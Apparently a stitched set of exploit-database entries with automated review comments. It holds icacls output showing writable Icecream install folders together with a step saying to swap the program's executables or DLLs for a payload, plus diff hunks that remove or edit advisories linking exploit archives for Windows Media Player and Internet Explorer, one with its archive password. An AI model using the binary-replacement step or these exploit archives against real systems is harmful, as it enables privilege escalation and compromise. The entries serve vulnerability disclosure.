BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files (x86)>icacls "Icecream Screen Recorder"
Icecream Screen Recorder Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace any of the application exe's or any of the dll's with your preferred payload and wait for execution.
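Review bot: the "Software Versions Affected" line names "Icecream Screen Recorder" twice (4.21 and 2.12), while the Software Link line and the description cover Ebook Reader, Screen Recorder and Slideshow Maker; the 2.12 entry is evidently meant to be Slideshow Maker and should be corrected. The Slideshow Maker proof is also incomplete: the first two listings start with `C:\Program Files (x86)>icacls "..."` and are in `icacls` format, whereas the third begins directly with `C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C` in `cacls` format and under `C:\Program Files` rather than `(x86)`; include the command that produced it and the system it was run on. Grammar: "weak folder permissions that grants" should read "that grant", and "it's subfolders" should read "its subfolders".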

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/1976/info
Windows Media Player is an application used for digital audio, and video content viewing.
It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.
Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20424.zip
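Review bot: this hunk deletes the whole description file, and the removed text is the only reference to the binary at `.../sploits/20424.zip`; if the advisory is being re-filed rather than dropped, the commit message should say where it moved, otherwise the archive becomes an orphan with no description of what it contains.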

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7539/info
Internet Explorer is reported to be vulnerable to a zone bypass issue. Allegedly, if Internet Explorer attempts to open a web page containing numerous 'file://' requests each contained in a separate Iframe, the requested file will eventually be executed in the Local Computer zone.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22575.rar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22575.rar (dmz.rar Password: zones)
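Review bot: the replacement line appends `(dmz.rar Password: zones)` to the same line as the download URL; tools that extract links from these text files will pick up the trailing text as part of the URL. Put the archive name and password on their own line below the link.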